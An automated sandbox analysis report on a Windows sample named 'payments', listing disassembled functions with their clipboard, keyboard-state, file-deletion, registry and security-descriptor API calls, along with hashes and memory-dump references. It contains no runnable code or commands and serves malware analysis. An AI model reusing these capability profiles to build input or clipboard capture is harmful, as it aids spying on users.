                                                                                                                          • Instruction ID: 9027a854caf975a11b4fec94ec4db34cd6f0a4a6890a35e02b21071d9eec7a24
                                                                                                                          • Opcode Fuzzy Hash: 4fae4f3b549e3891d55e579b851796c8fb1e6efdb7bcf28516475bfaef15a318
                                                                                                                          • Instruction Fuzzy Hash: F151117280821C6ACB21EBA5CC45DEF77BCAF05300F0541E6E695E2241EF769789DFA4
                                                                                                                          Function 00CE6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OpenClipboard.USER32(00D2DC00), ref: 00CE6B36
                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CE6B44
                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 00CE6B4C
                                                                                                                          • CloseClipboard.USER32 ref: 00CE6B58
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00CE6B74
                                                                                                                          • CloseClipboard.USER32 ref: 00CE6B7E
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00CE6B93
                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00CE6BA0
                                                                                                                          • GetClipboardData.USER32(00000001), ref: 00CE6BA8
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00CE6BB5
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00CE6BE9
                                                                                                                          • CloseClipboard.USER32 ref: 00CE6CF6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3222323430-0
                                                                                                                          • Opcode ID: ce2fc181e8dda4a41365dcb40b506aba0421c779e1b1b9d9fff00d2aba7a25bc
                                                                                                                          • Instruction ID: 8939aaa16857b8a4c3d508ba2ad4930c5ef49908f8a61e5844b473eff0d73ca6
                                                                                                                          • Opcode Fuzzy Hash: ce2fc181e8dda4a41365dcb40b506aba0421c779e1b1b9d9fff00d2aba7a25bc
                                                                                                                          • Instruction Fuzzy Hash: 5351B231204345ABD700AF61DC8AFAE77A9AF94B50F104129F566D22D1DF70D906DB72
                                                                                                                          Function 00CDF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CDF62B
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CDF67F
                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDF6A4
                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDF6BB
                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDF6E2
                                                                                                                          • __swprintf.LIBCMT ref: 00CDF72E
                                                                                                                          • __swprintf.LIBCMT ref: 00CDF767
                                                                                                                          • __swprintf.LIBCMT ref: 00CDF7BB
                                                                                                                            • Part of subcall function 00CB172B: __woutput_l.LIBCMT ref: 00CB1784
                                                                                                                          • __swprintf.LIBCMT ref: 00CDF809
                                                                                                                          • __swprintf.LIBCMT ref: 00CDF858
                                                                                                                          • __swprintf.LIBCMT ref: 00CDF8A7
                                                                                                                          • __swprintf.LIBCMT ref: 00CDF8F6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                          • API String ID: 835046349-2428617273
                                                                                                                          • Opcode ID: 047d1a9909d3bc8b46654fb8c75caf783cba87623b6466cf5be7bcad9e1f69d6
                                                                                                                          • Instruction ID: 063430764883a8a365bec22795713f81d64a6ed52c453fd302279ae64b74198d
                                                                                                                          • Opcode Fuzzy Hash: 047d1a9909d3bc8b46654fb8c75caf783cba87623b6466cf5be7bcad9e1f69d6
                                                                                                                          • Instruction Fuzzy Hash: C6A132B2408344ABC710EBA4C895DAFB7ECBF99704F44482EF595C3151EB34DA49D762
                                                                                                                          Function 00CE1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00CE1B50
                                                                                                                          • _wcscmp.LIBCMT ref: 00CE1B65
                                                                                                                          • _wcscmp.LIBCMT ref: 00CE1B7C
                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00CE1B8E
                                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00CE1BA8
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CE1BC0
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CE1BCB
                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00CE1BE7
                                                                                                                          • _wcscmp.LIBCMT ref: 00CE1C0E
                                                                                                                          • _wcscmp.LIBCMT ref: 00CE1C25
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE1C37
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00D439FC), ref: 00CE1C55
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1C5F
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CE1C6C
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CE1C7C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 1803514871-438819550
                                                                                                                          • Opcode ID: 99d27a8fb7f9fa168fdbbbafae3a9f1da500afd1af4e382dd8644174106cd375
                                                                                                                          • Instruction ID: a19775f54d16a5eac2c779d6b789b5d861187b7d5a0d712e6659d7532b7e7d5e
                                                                                                                          • Opcode Fuzzy Hash: 99d27a8fb7f9fa168fdbbbafae3a9f1da500afd1af4e382dd8644174106cd375
                                                                                                                          • Instruction Fuzzy Hash: 4B31D1725403597FCF20AFB5EC49ADE77ADAF05320F284195EC21E2190EB70DB998A74
                                                                                                                          Function 00CE1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00CE1CAB
                                                                                                                          • _wcscmp.LIBCMT ref: 00CE1CC0
                                                                                                                          • _wcscmp.LIBCMT ref: 00CE1CD7
                                                                                                                            • Part of subcall function 00CD6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CD6BEF
                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00CE1D06
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CE1D11
                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00CE1D2D
                                                                                                                          • _wcscmp.LIBCMT ref: 00CE1D54
                                                                                                                          • _wcscmp.LIBCMT ref: 00CE1D6B
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE1D7D
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00D439FC), ref: 00CE1D9B
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1DA5
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CE1DB2
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CE1DC2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 1824444939-438819550
                                                                                                                          • Opcode ID: 6797efeb8149c3e45df0ced1f6f63af3fdeb7a34894254513f89c5977b035a7e
                                                                                                                          • Instruction ID: 985cb054c7936173ab4f5e71318a848aa07dcb259674504032d519029f94eacc
                                                                                                                          • Opcode Fuzzy Hash: 6797efeb8149c3e45df0ced1f6f63af3fdeb7a34894254513f89c5977b035a7e
                                                                                                                          • Instruction Fuzzy Hash: F531F03250065A7FCF22AFA5EC09ADE37AD9F05324F284551EC21E2190DB70DB998E64
                                                                                                                          Function 00CE091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00CE09DF
                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CE09EF
                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CE09FB
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CE0A59
                                                                                                                          • _wcscat.LIBCMT ref: 00CE0A71
                                                                                                                          • _wcscat.LIBCMT ref: 00CE0A83
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CE0A98
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0AAC
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0ADE
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0AFF
                                                                                                                          • _wcscpy.LIBCMT ref: 00CE0B0B
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CE0B4A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3566783562-438819550
                                                                                                                          • Opcode ID: 2ffc65ae4e524d58c7bfe14e5e95745233654bfa132f34f68114b5c31131deb7
                                                                                                                          • Instruction ID: 873efbb5f41eb829d099b8b160586fe5913b50df7459408f0478e5d558af9b01
                                                                                                                          • Opcode Fuzzy Hash: 2ffc65ae4e524d58c7bfe14e5e95745233654bfa132f34f68114b5c31131deb7
                                                                                                                          • Instruction Fuzzy Hash: 8B61AE721043459FCB10EF61C84599EB3E8FF89314F14892EF999C7252EB35EA45CB92
                                                                                                                          Function 00CCA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCABD7
                                                                                                                            • Part of subcall function 00CCABBB: GetLastError.KERNEL32(?,00CCA69F,?,?,?), ref: 00CCABE1
                                                                                                                            • Part of subcall function 00CCABBB: GetProcessHeap.KERNEL32(00000008,?,?,00CCA69F,?,?,?), ref: 00CCABF0
                                                                                                                            • Part of subcall function 00CCABBB: HeapAlloc.KERNEL32(00000000,?,00CCA69F,?,?,?), ref: 00CCABF7
                                                                                                                            • Part of subcall function 00CCABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCAC0E
                                                                                                                            • Part of subcall function 00CCAC56: GetProcessHeap.KERNEL32(00000008,00CCA6B5,00000000,00000000,?,00CCA6B5,?), ref: 00CCAC62
                                                                                                                            • Part of subcall function 00CCAC56: HeapAlloc.KERNEL32(00000000,?,00CCA6B5,?), ref: 00CCAC69
                                                                                                                            • Part of subcall function 00CCAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CCA6B5,?), ref: 00CCAC7A
                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CCA6D0
                                                                                                                          • _memset.LIBCMT ref: 00CCA6E5
                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CCA704
                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00CCA715
                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00CCA752
                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CCA76E
                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00CCA78B
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CCA79A
                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00CCA7A1
                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CCA7C2
                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00CCA7C9
                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CCA7FA
                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CCA820
                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CCA834
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3996160137-0
                                                                                                                          • Opcode ID: ce68b6009707b93f628cf80eb065d68439a3ed0bae580fcf5cc237111d3430f1
                                                                                                                          • Instruction ID: 6987d4941650fa8978ade7f8d454c8f02ab642b7e1c6ad0c245b638952c3d087
                                                                                                                          • Opcode Fuzzy Hash: ce68b6009707b93f628cf80eb065d68439a3ed0bae580fcf5cc237111d3430f1
                                                                                                                          • Instruction Fuzzy Hash: 75513971900209BFDF10DFA5DC58EEEBBB9FF08304F148129E925E6290DB359A06DB61
                                                                                                                          Function 00C96F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                          • API String ID: 0-4052911093
                                                                                                                          • Opcode ID: 24ab914b706708e4e325b5c37022f589e3148ad46af62c16b44970fc99b37ac8
                                                                                                                          • Instruction ID: 06b9653d96238c78f28568cfb5500b8647664d88444037837d2de2efcf0ab402
                                                                                                                          • Opcode Fuzzy Hash: 24ab914b706708e4e325b5c37022f589e3148ad46af62c16b44970fc99b37ac8
                                                                                                                          • Instruction Fuzzy Hash: 95727E71E14219DBDF24CF59D8847FEB7B5BF08310F14416AE859EB281EB709A81DBA0
                                                                                                                          Function 00CD63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD5FA6,?), ref: 00CD6ED8
                                                                                                                            • Part of subcall function 00CD72CB: GetFileAttributesW.KERNEL32(?,00CD6019), ref: 00CD72CC
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6441
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CD645F
                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00CD6474
                                                                                                                          • _wcscpy.LIBCMT ref: 00CD64A3
                                                                                                                          • _wcscat.LIBCMT ref: 00CD64B8
                                                                                                                          • _wcscat.LIBCMT ref: 00CD64CA
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00CD64DA
                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CD64EB
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00CD6506
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                          • String ID: \*.*
                                                                                                                          • API String ID: 2643075503-1173974218
                                                                                                                          • Opcode ID: 998a20c3f6866b2a39a8874796d28555a87f22edaed82d945012be8262fc6b87
                                                                                                                          • Instruction ID: 2895c32d10cca841c6203d360114a9c313c3cbd1ce5275489621539dac422d62
                                                                                                                          • Opcode Fuzzy Hash: 998a20c3f6866b2a39a8874796d28555a87f22edaed82d945012be8262fc6b87
                                                                                                                          • Instruction Fuzzy Hash: E331B1B2408384AAC721DBA488859DBB7DCAF55300F44492FF6E9C3241EB35D64DD7A7
                                                                                                                          Function 00CF31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CF3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF328E
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CF332D
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CF33C5
                                                                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CF3604
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF3611
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1240663315-0
                                                                                                                          • Opcode ID: dec16362c499e56f70a3f9f8c66a9fcaa82068d19d5cc22389830901ba80c2b8
                                                                                                                          • Instruction ID: 2ad9d644aaa28cd39d8b8e86456d6bd4d446c0fe6eec475c81b318242cc43d8e
                                                                                                                          • Opcode Fuzzy Hash: dec16362c499e56f70a3f9f8c66a9fcaa82068d19d5cc22389830901ba80c2b8
                                                                                                                          • Instruction Fuzzy Hash: C7E18C31204244AFCB14DF69C895E6ABBE9FF88314F04846DF55ADB2A1DB31EE05CB52
                                                                                                                          Function 00CD2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetKeyboardState.USER32(?), ref: 00CD2B5F
                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00CD2BE0
                                                                                                                          • GetKeyState.USER32(000000A0), ref: 00CD2BFB
                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00CD2C15
                                                                                                                          • GetKeyState.USER32(000000A1), ref: 00CD2C2A
                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00CD2C42
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00CD2C54
                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00CD2C6C
                                                                                                                          • GetKeyState.USER32(00000012), ref: 00CD2C7E
                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00CD2C96
                                                                                                                          • GetKeyState.USER32(0000005B), ref: 00CD2CA8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 541375521-0
                                                                                                                          • Opcode ID: 97e5592b3900164e153fbb87d07b22bd6f017354e9f795c7c85fcf33ab99a69e
                                                                                                                          • Instruction ID: b8e3900755b4cdcbcdc428204d9166a27a714e9b6abfa79ed61782b2223a9fd3
                                                                                                                          • Opcode Fuzzy Hash: 97e5592b3900164e153fbb87d07b22bd6f017354e9f795c7c85fcf33ab99a69e
                                                                                                                          • Instruction Fuzzy Hash: 7D41B230614BC96AFB319B6088047B9BEA1AB72304F04809BD7D6563C1DBD49EC4C7A2
                                                                                                                          Function 00CE6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1737998785-0
